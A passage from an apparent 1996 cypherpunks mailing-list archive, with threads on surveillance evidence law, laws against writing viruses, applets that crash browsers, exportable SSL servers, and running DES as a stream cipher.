    I also think the majority of us can look at that and say "what a bad 
thing."  But the real question is what we want to do about it.

> I seem to recall a news item from Washington state within the last couple of 
> years in which a conviction was thrown out because evidence was obtained  
> with thermal-IR imagers.  You know, look for the hot house and it's being 
> used to grow pot.  Problem is, that kind of viewing is not normally publicly 
> apparent, so a citizen has a reasonable belief that it can't be used against 
> him.  In another case, in Oregon, the use of night-vision goggles to observe 
> people (at least in collecting evidence) was thrown out, for the same 
> reason:  Even if, arguably, people were out "in public," they had a 
> reasonable expectation that they would not be observed if they were careful 
> to remain in the dark.

    Throw out the IR gogs then and look at the rest of the picture.  You 
still have the binoculars, the dish microphones and plain old eyes.  
Dosn't this pose a more reasonable comparison to your original topic of 
wiretaps?

   I have a feeling though that IR vision will become more accepted by the 
courts as a valid means of surveilance as its use increases.

> One more thing:  Until about 1968, the private use of tiny recording 
> microphones, in public, was essentially unlimited.  About that year, in many 
> states, it was restricted. (In some states it's illegal to record 
> conversations by surreptitious means, EVEN IF you're a party to that 
> conversation.  How bizarre!)

    And unconveinent for those of us who would like to be able to record 
our conversations without the explicit permission of the other party.

> My theory is that politicians recognized, 
> correctly, that they would be the ones most subject to such recording, and 
> since they engaged in incriminating (bribery) conversations fairly 
> regularly, they didn't want lobbyists to be able to collect a series of 
> recorded conversations that could later be used against the politician if 
> they later fell out of favor.

    While that may have been some of their original intentions for 
passing such a bill, do you think people who are already involved in 
illegal activities would stop and think "Wait a minute, I can't ILLEGALLY 
record this bribe,"?  Such blackmails surely continue.

> The reason I consider "the system" to be so crooked is that it tries to get 
> away with things like this whenever it can.

    Well, think about the situation.  The number of people who aren't
prosecuted after a wiretap is likely a small fraction of the whole number of
wiretaps (then again, how do we know?).  The number that find out they 
were under observation but not prosecuted is even more likely nil.  So, 
where are your chances to challenge this in court?  Where are the test cases?
Admitedly, Congress shouldn't have to wait for a case to take action to 
change this practice, but I doubt they are going to make a fuss about it 
before anyone else does.

Bruce Marshall




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Marshall <brucem@wichita.fn.net>
Date: Tue, 23 Apr 1996 01:55:56 +0800
To: cypherpunks@toad.com
Subject: Re: Bernstein ruling meets the virus law
In-Reply-To: <Pine.BSF.3.91.960420125016.6813A-100000@kirk.edmweb.com>
Message-ID: <Pine.BSI.3.91.960422084746.14906B-100000@wichita.fn.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 20 Apr 1996, Steve Reid wrote:

> In Canada, there is a law that makes "unauthorized use of computing
> resources" illegal. That makes both hacking and malicious virus spreading
> illegal with one law, without making it illegal to share virus information
> and source code. 

     Several other countries have very similiar laws.  However, I had 
heard a somewhat unproven rumor that a U.S. state had actually made the 
writing of programs with malicious purposes illegal.  Basically meaning 
that if you write a virus you have committed a crime.  Like I said 
though, this was just a statement in a message so I can't vouch for the 
accuracy.

Bruce Marshall




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Fletcher <fletch@ain.bls.com>
Date: Tue, 23 Apr 1996 01:29:18 +0800
To: cypherpunks@toad.com
Subject: Re: java security
In-Reply-To: <v02120d1dada0c4c8e7c4@[192.0.2.1]>
Message-ID: <9604221338.AA04168@outland.ain_dev>
MIME-Version: 1.0
Content-Type: text/plain


> >A couple of glitches I've gotten from Javascripts are poorly
> >(purposely?) written applets that crash. One kept printing a modal
> >dialog box continuously, the result being a need to reboot the
> >computer because there was no way to exit Netscape or Windows.
>
> I can confirm this. Under Win95, I have seen applets that keep running
> after the browswer instance that loaded has been closed. Even run over
> other applications windows, leaving aninmated artifacts on the screen.
> Sometimes only the power switch will do. I thought that the applets weren't
> supposed to be able to wander out of their memory space...

	Applets (let alone javascript) should have no way to exist
once you kill the Netscape that is running the Java interpreter.  It
is possible for applets to keep running in their own thread even after
you've left the page they're loaded from, but once you kill the
browser the VM should get shut down (the whole browser, not just a
particular window).  I can't think of any way that an applet could
keep going once the VM stops.

	As for the original dialog thing, couldn't you C-A-Del it
to get the task window up and then shutdown the offending NS task?

---
Fletch                                                     __`'/|
fletch@ain.bls.com  "Lisa, in this house we obey the       \ o.O'    ______
404 713-0414(w)      Laws of Thermodynamics!" H. Simpson   =(___)= -| Ack. |
404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43  U      ------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Tue, 23 Apr 1996 01:49:59 +0800
To: <cypherpunks@toad.com>
Subject: Re: Add-in encryption module to Netscape
Message-ID: <199604221333.GAA13236@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


runner@asiapac.net

> Hi, 
> 
> Lurking here for quite some time until now a real problem has come up and I
> need help here.
> 
> I'm not in the US of A and the Netscape commerce server that my employer 
> recently purchased has only 48bit key (as told by the salesman). My question is
> whether it is possible to add-in my own security module (RSA) and secondly, how
> difficult is it? The salesman cannot answer me.
> 
> Thanks a lot. 

Funny, this looks an awful lot like a query (with an apparently real name
attached) which appeared in www-security last week from Malaysia.

I'm aware of the following servers, available outside the US, which 
claim to offer 128 bit SSL encryption:

Apache-SSL 
 Unix
 see http://www.algroup.co.uk/Apache-SSL
 free, commercial support available.
 supports client authentication
 Available from British sites

Sioux
 Unix (solaris)
 see ftp://ftp.inect.co.za/pub/products/sioux/ANNOUNCE
 support client authentication
 Based on Apache
 2500 Rand
 Available from South Africa

Alibaba
 NT/Win95
 see http://alibaba.austria.eu.net/	
 Available from Austria
 US $599

Zeus
 Very nice website at http://www.zeus.co.uk/
 Unix
 999 UK #
 Available from Britain

COSMOS
 Unix
 Nice site at http://www.ristech.com/SOMMAIRE/B_PRODUITS/INTERNET/
 WebCompare claims this has SSL2, but I can't find a mention of their
 Website. US $2000 and up. Available from France.

For a survey of web servers, I strongly recommend WebCompare: 

 http://www.webcompare.com


Peter Trei




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul_Koning/US/3Com%3COM@smtp1.isd.3com.com
Date: Tue, 23 Apr 1996 01:28:21 +0800
To: cypherpunks@toad.com
Subject: Re: Dictionary searching code
Message-ID: <9604221646.AA0800@>
MIME-Version: 1.0
Content-Type: text/plain


At 08:02 PM 4/19/96 -0500, Adam wrote:
> Does anyone have some code that will search a dictionary, and
>tell me *quickly* if an arbitrary chunk of text is in the dictionary?
>Pre-indexing steps are fine, as is using big chunks of disk for hash
>tables.  The point of course, is to check arbitrary possible plaintext
>that a test decryption produces.

If you want to do string matching (search for an exact match on a string --
as opposed to checking whether a set of words is in a database) a good
choice would be the Boyer-Moore algorithm.  It has the nice property
that worst case it requires O(n) time (n = dictionary byte count) but
on average it is quite a lot better -- and furthermore, the longer the string
you're looking for, the faster it gets...

 paul

!-----------------------------------------------------------------------
! Paul Koning, NI1D, C-24183
! 3Com Corporation, 1-3A, 118 Turnpike Road, Southborough MA 01772 USA
! phone: +1 508 229 1695, fax: +1 508 490 5873
! email: paul_koning@isd.3com.com  or  paul_koning@3mail.3com.com
! Pgp:   27 81 A9 73 A6 0B B3 BE 18 A3 BF DD 1A 59 51 75
!-----------------------------------------------------------------------
! "Be wary of strong drink.  It can make you shoot at tax collectors
!  -- and miss!"
!                -- Robert A. Heinlein, "The Notebooks of Lazarus Long"
!                   in "Time Enough for Love"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jed Liu" <LJT@fs3.ucc.on.ca>
Date: Tue, 23 Apr 1996 01:53:41 +0800
To: cypherpunks@toad.com
Subject: Entropy
Message-ID: <C11834F190D@fs3.ucc.on.ca>
MIME-Version: 1.0
Content-Type: text/plain


I've heard a lot of discussion here about "entropy tests" and "tests 
for randomness".  Could somebody please explain to me one of these 
tests (or would that take too long?) ?  Thanks.


-=[###########################]=-
-=[##        Jed Liu        ##]=-
-=[##   ljt@fs3.ucc.on.ca   ##]=-
-=[###########################]=-

Things are entirely what they appear to be--and behind them...there
is nothing.
                                       --Jean-Paul Sartre, "Nausea"

    SignaQuote v1.00 by Jed Liu    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 23 Apr 1996 06:41:06 +0800
To: cypherpunks@toad.com
Subject: Re: Nazis on the Net
In-Reply-To: <01I3T7WPGNL48Y4Y84@mbcl.rutgers.edu>
Message-ID: <Pine.ULT.3.92.960422103411.1448D-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


I've been told that Crawford is a clueful science fiction writer.

I'm not interested in discussing this here, but I and others (including
some self-described Nazis) have posted responses to
alt.internet.media-coverage.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Sentiono Leowinata" <sentiono@cycor.ca>
Date: Tue, 23 Apr 1996 06:13:39 +0800
To: "cypherpunks@toad.com>
Subject: OFF Topic: MS-Exchange bug (winmail.dat)
Message-ID: <199604221430.LAA03540@bud.peinet.pe.ca>
MIME-Version: 1.0
Content-Type: text/plain


I need help to disable the long-trailer from MS-Exchange. 
Everytime my friend sends me an e-mail, the "trailer" (winmail.dat)
always there. How to disable it or turn it off? I believe someone
mention about this "feature" in this mailing list long time ago, but
I can't find it in my archive. 
Thank you.
Sent.

ps. can Winmail.Dat be considered as cryto-useless? <grin>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arley Carter <ac@hawk.twinds.com>
Date: Tue, 23 Apr 1996 04:08:32 +0800
To: Jon Leonard <jleonard@divcom.umop-ap.com>
Subject: Re: Spaces in passwords
In-Reply-To: <9604181538.AA16305@divcom.umop-ap.com>
Message-ID: <Pine.HPP.3.91.960422114851.20543B-100000@hawk.twinds.com>
MIME-Version: 1.0
Content-Type: text/plain


How is a control character, @, and # any different from typing an uppercase
letter?  Just curious.

Arley Carter
Tradewinds Technologies, Inc.
email: ac@hawk.twinds.com
www: http://www.twinds.com

"Trust me. This is a secure product. I'm from <insert your favorite 
corporation or government agency>."

On Thu, 18 Apr 1996, Jon Leonard wrote:

> > Ben Rothke writes:
> > > Do spaces (ASCII 20) in passwords make them less secure?
> > 
> > Of course not. In a normal Unix password, adding spaces to the
> > password search space increases the search space, so it necessarily
> > makes the search harder.
> 
> The exception to this is when you may be overheard typing a password.
> The space bar sounds different, and an attacker who knows you've used
> a space has a significantly smaller search space.
> 
> So I usually recommend avoiding space, @, #, and control characters
> when generating passwords.  Have I missed any or gotten too many?  
> 
> > .pm
> 
> Jon Leonard
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Van Schoiack <schoiack@tahoma.cwu.edu>
Date: Tue, 23 Apr 1996 07:53:00 +0800
To: cypherpunks-seattle@netcom.com
Subject: Re: Portland Cypherpunk Meeting for April
In-Reply-To: <2.2.32.19960416035657.00ab813c@mail.teleport.com>
Message-ID: <Pine.VUL.3.91.960422121748.3032A-100000@tahoma.cwu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hello,
  I'm a student at Central Wash. University and would like to attend the
conference.  Is there anyone that would be willing to give me a ride.  

  If you stay over, I've a friend I can stay with..

  I don't have a (functioning) car, but can get a ride to the Seattle area..

  My phone number is 509-925-3662.

  Will contibute gas money.

Thanks,
Chris Van Schoiack


On Mon, 15 Apr 1996, Alan Olsen wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> There will be another physical meeting on the Cypherpunks in Portland, OR.
> 
> The particulars:
> 
> Location:   Powell's Technical Bookstore
>             33 NW Park
>             Portland, OR 97209
>             (Just north of Burnside off of the Park blocks.)
> 
> Date:       April 27th, 1996
> Time:       5:23pm
> 
> Discussions will cover:
> 
> ** A Portland Remailer
> 
> ** Various Coding Projects
> 
> ** Events in the News
> 
> ** Other Projects related to Crypto (Web sites and Documentation)
> 
> ** Possible PGP Keysigning (Depends on the response)
> 
> ** General Discussion Devolving into Chaos
> 
> If you have any other topics for discussion, bring them up at the meeting or 
> you can e-mail me in advance.
> 
> Powell's Technical Book has a good selection of crypto books, so you might 
> want to be prepared.  (Do not bring money you cannot afford to spend.  
> Powell's has an evil force that seduces people into buying books.)
> 
> A PGP keysigning will be held if there are enough interested people.  If you 
> are interested in participating, please send me your public key via e-mail.
> 
> Any comments, suggestions, ideas, and/or complains can be sent to me at 
> alano@teleport.com.
>  
> 
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQEVAwUBMXMZZeQCP3v30CeZAQG0/Af/To2q0fuLk8Q6KquP+6LX1/1EOqGGoxBZ
> jWfCJoz40Wk1EHMJMis+XpiPgcXg2nAZNeQXubS4Q9se8uGG57UbzpX8rv5GnzdV
> HWimufNeL/bfxSn+OYswTEQExSwG2V/TSWZNwfFf5Xl/6V0zy1Xa5qY8CEtXn1fr
> 3/vXicYexd3NwSvToN5udYYtUe2kH14O3RIoXAnaJwMZLvS+oiDzw8LWXI7UMdsf
> akUbhisfgf/lu3wiMVQkN2hdP15rioIlAhryA0skvl1fxh3OkFC8/GDJpRBRWD+K
> RjO5VgRRXYrQUG4PKAK8Y1/PSINzandOkaMc2duaSshslZYyI3YRmg==
> =zD1a
> -----END PGP SIGNATURE-----
> ---
> Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
>         `finger -l alano@teleport.com` for PGP 2.6.2 key 
>                 http://www.teleport.com/~alano/ 
>   "We had to destroy the Internet in order to save it." - Sen. Exon
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 23 Apr 1996 08:58:17 +0800
To: Bill Stewart <cypherpunks@toad.com
Subject: Re: java security
Message-ID: <v02120d25ada197b3463b@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 23:35 4/21/96, Bill Stewart wrote:

>Were they Java, or JavaScript?  Much different.  Among other things,
>JavaScript runs on Win3.1, and Netscape doesn't let you turn it off.
>I've had at least one event of JavaScript crashing Netscape; the part
>of the script I noticed was scrolling lots of stuff along the bottom

Javascript started the new browser. The renegade applet was Animator, which
is Java, I believe.

I didn't spend much effort investigating it, since I try to stay away from
doing things over that have hosed my system twice in a row. Win95, Atlas
beta. The offending page was http://www.dippybird.com/java.html


Disclaimer: My opinions are my own, not those of my employer.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Tue, 23 Apr 1996 09:47:56 +0800
To: cypherpunks@toad.com
Subject: Re: java security
Message-ID: <2.2.32.19960422212139.00aa57ec@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:26 PM 4/22/96 -0700, Lucky Green wrote:
>At 23:35 4/21/96, Bill Stewart wrote:
>
>>Were they Java, or JavaScript?  Much different.  Among other things,
>>JavaScript runs on Win3.1, and Netscape doesn't let you turn it off.
>>I've had at least one event of JavaScript crashing Netscape; the part
>>of the script I noticed was scrolling lots of stuff along the bottom
>
>Javascript started the new browser. The renegade applet was Animator, which
>is Java, I believe.
>
>I didn't spend much effort investigating it, since I try to stay away from
>doing things over that have hosed my system twice in a row. Win95, Atlas
>beta. The offending page was http://www.dippybird.com/java.html

The one advantage to Netscape 3.0 is that you can turn Javascript off.  (You
may be able to do that in 2.01 as well...)

3.0 has some pretty nasty bugs.  There appears to be a memory leak dealing
with forms, as well as a number of nasty little gotchas.  (I have been
getting crashes that seem to be assocaited with one of the plug-ins.)

Hopefully the next beta is out for 3.0.  (I have not checked in the last
couple of days, so it may be...  Sunday night seems to be the favored time
of posting.)
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 23 Apr 1996 10:55:31 +0800
To: cypherpunks@toad.com
Subject: Biometric ID
Message-ID: <2.2.32.19960422182608.0081eeb4@popserver.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Someone asked about biometric ID requirements in HR 2202 "Immigration in the
National Interest Act of 1996".  This passed the House a few weeks ago.  The
Senate may pass it this week or next.  Watch out for stuff to slip back in
in the Conference Committee.

The whole "pilot program" to develop a forge resistant biometric ID card has
been removed from the bill.  The Border Crossing Cards that speed crossings
from Mexico are supposed to have machine readable finger prints or hand
prints added but those can probably be duped by the forgers.

The online SS# verification program is reduced to a voluntary (for the
employer) pilot.

DCF







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <steve@edmweb.com>
Date: Tue, 23 Apr 1996 10:03:22 +0800
To: Bruce Marshall <brucem@wichita.fn.net>
Subject: Re: Bernstein ruling meets the virus law
In-Reply-To: <Pine.BSI.3.91.960422084746.14906B-100000@wichita.fn.net>
Message-ID: <Pine.BSF.3.91.960422143210.10285A-100000@kirk.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


>      Several other countries have very similiar laws.  However, I had 
> heard a somewhat unproven rumor that a U.S. state had actually made the 
> writing of programs with malicious purposes illegal.  Basically meaning 
> that if you write a virus you have committed a crime.  Like I said 
> though, this was just a statement in a message so I can't vouch for the 
> accuracy.

Hmm... "malicious purposes".... How would they determine that? Some
viruses are clearly designed to be destructive, but some do nothing but
replicate. Then there are viruses and worms (like RTM's) that crash
systems, but may or may not have been designed to do that. Then there are
trojan horses, which look useful, but are designed to crash your
machine... Then there are programs that are designed to be useful, but
have bugs that will cause your machine to crash. 

Things are only black and white in lawmaker's dreams. :-/


=====================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/)    |
| Email: steve@edmweb.com   Home Page: http://www.edmweb.com/steve/ |
| PGP Fingerprint: 11 C8 9D 1C D6 72 87 E6  8C 09 EC 52 44 3F 88 30 |
|              -- Disclaimer: JMHO, YMMV, IANAL. --                 |
===================================================================:)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MBSFT-0K <MBSFT-0K@carraig.ucd.ie>
Date: Tue, 23 Apr 1996 01:28:44 +0800
To: cypherpunks@toad.com
Subject: Re: Unsubsrive
Message-ID: <4E964C26B1@carraig.ucd.ie>
MIME-Version: 1.0
Content-Type: text/plain




> 

> 
> unsubscribe cypherpunks      
Lorca Kelly
MBSFT-0K@carraig.ucd.ie




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienke@aol.com
Date: Tue, 23 Apr 1996 07:34:16 +0800
To: cypherpunks@toad.com
Subject: Re: OS/2 encryption
Message-ID: <960422145817_380368356@emout18.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-04-21 22:11:06 EDT, Lucky Green  wrote:

>Back up the HD to tape (encrypt the data on the tape). Move the tape out of
>reach. And don't tell anyone, especially not this list, that you did that.

Personally, I recommend the Syquest EZdrive over tape.  The EZ is a fully
functional (bootable, too) 130 MB hard drive ($200 for an IDE internal model,
also available in SCSI and parallel port versions)  that uses removable
cartridges ($20 each) for storage.  Most backup programs let you back up to a
hard drive, which is much faster than tape, and more reliable as well.  Ditto
the bit about storing the backups (whatever media) somewhere the CO$ will
never find them, and keeping your mouth shut about it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Marshall <brucem@wichita.fn.net>
Date: Tue, 23 Apr 1996 09:34:08 +0800
To: cypherpunks@toad.com
Subject: Re: Bernstein ruling meets the virus law
In-Reply-To: <Pine.SCO.3.91.960422142653.7158C-100000@grctechs.va.grci.com>
Message-ID: <Pine.BSI.3.91.960422151102.19963B-100000@wichita.fn.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 22 Apr 1996, Mark Aldrich wrote:

> On Mon, 22 Apr 1996, Bruce Marshall wrote:

> >      Several other countries have very similiar laws.  However, I had 
> > heard a somewhat unproven rumor that a U.S. state had actually made the 
> > writing of programs with malicious purposes illegal.  Basically meaning 
> > that if you write a virus you have committed a crime.  Like I said 
> > though, this was just a statement in a message so I can't vouch for the 
> > accuracy.

> But, define "malicious purpose."  One man's low-level format is another 
> man's desired application of the moment.

    There usually is a pretty apparent line between authorized and 
unauthorized functions in regards to computer programs.  I don't think 
that even Microsoft with their pages of disclaimers could release software 
that, unbeknownst to its user, destroyed data.  

> I hate to paraphrase a tired 
> line, but "self-replicating programs don't hurt computers - mean people 
> do."

    I have heard AV people argue that regardless of its purpose 
(malicious/destructive or not) all viruses can be harmful.  Whether this 
is simply running the computer out of memory or using bad system calls that 
result in data loss is irrelevant to them.  I don't quite buy into that 
argument since we can find the same flaws to be inherent in any software we
run.  However, since you haven't really consciously allowed the program to do
whatever it is doing, the person who infected your machine is typically to be
held responsible for unauthorized access at a minimum.

>  The term "virus" connotes a pathogenic quality in the mind of 
> many.  Unfortunately, this tendency continues in the use of the word 
> 'virus' within our community.

    Personally, I can see many useful functions for viruses.  But I find the 
viruses that simply destroy data--which tends to be the majority--to be 
quite boring and childish.  A non-destructive and innovative virus is 
very interesting and comparable to any good software hack in my eyes.

> While I understand that "intent" is something with which lawyers have to 
> contend when they defend or prosecute a case, I don't think that the 
> notion of intent to commit harm extrapolates correctly into the field of 
> virus writing. 

    These were not my thoughts as I was only commenting on a alleged law 
that had been passed.  I agree that we can't look into our crystal ball 
and see whether Mr. McViruswriter had really intended for his virus to 
wipe out part of the Secret Service's computer network.  I would wager 
that if legislators did indeed pass such a law in the U.S., they probably 
were hammered with the same type of anti-virus propaganda that AV people 
always seem to be throwing out.

Bruce Marshall




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Aldrich <maldrich@grctechs.va.grci.com>
Date: Tue, 23 Apr 1996 08:16:23 +0800
To: Bruce Marshall <brucem@wichita.fn.net>
Subject: Re: Bernstein ruling meets the virus law
In-Reply-To: <Pine.BSI.3.91.960422084746.14906B-100000@wichita.fn.net>
Message-ID: <Pine.SCO.3.91.960422142653.7158C-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 22 Apr 1996, Bruce Marshall wrote:

> Date: Mon, 22 Apr 1996 08:50:21 -0500 (CDT)
> From: Bruce Marshall <brucem@wichita.fn.net>
> Subject: Re: Bernstein ruling meets the virus law
> 
> On Sat, 20 Apr 1996, Steve Reid wrote:
> 
> > In Canada, there is a law that makes "unauthorized use of computing
> > resources" illegal. That makes both hacking and malicious virus spreading
> > illegal with one law, without making it illegal to share virus information
> > and source code. 
> 
>      Several other countries have very similiar laws.  However, I had 
> heard a somewhat unproven rumor that a U.S. state had actually made the 
> writing of programs with malicious purposes illegal.  Basically meaning 
> that if you write a virus you have committed a crime.  Like I said 
> though, this was just a statement in a message so I can't vouch for the 
> accuracy.

But, define "malicious purpose."  One man's low-level format is another 
man's desired application of the moment.  I hate to paraphrase a tired 
line, but "self-replicating programs don't hurt computers - mean people 
do."  The term "virus" connotes a pathogenic quality in the mind of 
many.  Unfortunately, this tendency continues in the use of the word 
'virus' within our community.

While I understand that "intent" is something with which lawyers have to 
contend when they defend or prosecute a case, I don't think that the 
notion of intent to commit harm extrapolates correctly into the field of 
virus writing. 

------------------------------------------------------------------------- 
|      Liberty is truly dead              |Mark Aldrich                 | 
|    when the slaves are willing          |GRCI INFOSEC Engineering     | 
|     to forge their own chains.          |maldrich@grci.com            | 
|        STOP THE CDA NOW!                |MAldrich@dockmaster.ncsc.mil | 
|_______________________________________________________________________| 
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     | 
|         and my employer gets no credit for them whatsoever.           | 
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Dierks <timd@consensus.com>
Date: Tue, 23 Apr 1996 14:37:01 +0800
To: "Karl A. Siil" <cypherpunks@toad.com
Subject: Re: DES as a stream cipher
Message-ID: <v02140b0aada1b8276f86@[206.170.39.104]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:45 PM 4/22/96, Karl A. Siil wrote:
>Folks,
>
>As this sounds like a previously solved problem, I wanted to find out about
>using DES (or any block cipher) as a stream cipher, i.e., in a manner that
>keeps input and output data length equal. I don't want to use a true stream
>cipher, as I want to use the same key for multiple messages and stream
>ciphers tend to place the bulk of their overhead in the re-key. Since stream
>ciphers have "memory," I would have to "re-key" to the same key for each of
>my messages. I would rather key something like DES once and run it in CBC
>mode or use some other form of IV.
>
>Help or pointers to help are greatly appreciated.

Just generate a stream of octets by running DES (or some other block
cipher) in the following mode:

C_-1 = IV
C_n = E_K(C_n-1)

i.e., start by encrypting the IV with your key, and thereafter generate a
block by encrypting the previous block with your key. Here the IV is
essentially part of the key.

XOR the resulting bits (or octets) with your plaintext to generate an
encrypted stream. Remember within your cipher's state the current output
block and how much of it you've used.

Note that if you reuse a key, you'll enable attacks that rely on the fact
that similar messages will produce similar ciphertext.

 - Tim Dierks

Tim Dierks  --  timd@consensus.com  --  www.consensus.com
Head of Thing-u-ma-jig Engineering, Consensus Development






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Tue, 23 Apr 1996 15:14:32 +0800
To: cypherpunks@toad.com
Subject: Re: Bernstein ruling meets the virus law
Message-ID: <2.2.32.19960422223911.006db2fc@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:28 PM 4/22/96 -0400, Mark Aldrich <maldrich@grctechs.va.grci.com> wrote:
[snip]
>While I understand that "intent" is something with which lawyers have to 
>contend when they defend or prosecute a case, I don't think that the 
>notion of intent to commit harm extrapolates correctly into the field of 
>virus writing. 

Intent may not even be a necessary part of a "computer crime" case.  Here in
Oregon, Randal Schwartz's case was the first test (I believe) of the state's
vague computer crime law.  Proving that Randal had malicious intent wasn't
part of the prosecution's case, AFAIK -- only that he had altered data
"without authorization."

Given that viewpoint, I can easily picture a virus author getting busted
here even if they didn't have intent to commit harm.  The O'Reilly book
_Computer Crime_ (by Icove, Seger & VonStorch) has a discussion of US
federal law in these areas and the state computer crime laws.


Rich

______________________________________________________________________
Rich Burroughs  richieb@teleport.com  http://www.teleport.com/~richieb
See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon
New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Tue, 23 Apr 1996 08:39:45 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Draft paper on law of digital signatures, CAs
Message-ID: <Pine.SUN.3.91.960422161257.15955B-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


[cross-posted to Cyberia-L, Cypherpunks  & Cyberprof; apologies for
duplication]

A preliminary draft of my paper on Digital Signatures, Certification
Authorities, and a few of the legal problems they (may) create can be
found under the title, "The Essential Role of Trusted Third Parties
in Electronic Commerce" at this URL:

http://www.law.miami.edu/~froomkin/articles/trusted.htm


A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@aeinet.com>
Date: Tue, 23 Apr 1996 12:01:26 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Smartcards are coming to the US
In-Reply-To: <ada03b280802100426fb@[205.199.118.202]>
Message-ID: <317C12C0.6C92@aeinet.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:

> Someday--maybe when Perry is out of the country at an IETF meeting--I'll
> forward my article about the scandalous plan to privatize the nation's food
> stores, thus making food only available to the rich and denying the poor of
> their access to the foodstuffs deemed nutricious by the Parent-Grocer
> Associations (PGAs) and available at their local People's Public Food
> Distribution Centers.

If it is online, could you send me a pointer?  Is it a searchable archive
somewhere?  Thanks.

Johnathan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Karl A. Siil" <karl@geoplex.com>
Date: Tue, 23 Apr 1996 13:13:12 +0800
To: cypherpunks@toad.com
Subject: DES as a stream cipher
Message-ID: <2.2.32.19960422214547.006b636c@geoplex.com>
MIME-Version: 1.0
Content-Type: text/plain


Folks,

As this sounds like a previously solved problem, I wanted to find out about
using DES (or any block cipher) as a stream cipher, i.e., in a manner that
keeps input and output data length equal. I don't want to use a true stream
cipher, as I want to use the same key for multiple messages and stream
ciphers tend to place the bulk of their overhead in the re-key. Since stream
ciphers have "memory," I would have to "re-key" to the same key for each of
my messages. I would rather key something like DES once and run it in CBC
mode or use some other form of IV.

Help or pointers to help are greatly appreciated.

                                        Karl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 23 Apr 1996 13:31:55 +0800
To: cypherpunks@toad.com
Subject: TOE_hol
Message-ID: <199604222155.RAA28631@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   4-22-96. WJur:

   "French Smart Card Proves a Bright Idea. Once-Shunned
   European Innovation Is Sizzling."

   Reports on French dominance of the burgeoning global smart-
   card use, and which hungry giants are prowling for fries.

   Compares security munitions and foot shootings.

   TOE_hol







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 23 Apr 1996 11:58:39 +0800
To: "Karl A. Siil" <karl@geoplex.com>
Subject: Re: DES as a stream cipher
In-Reply-To: <2.2.32.19960422214547.006b636c@geoplex.com>
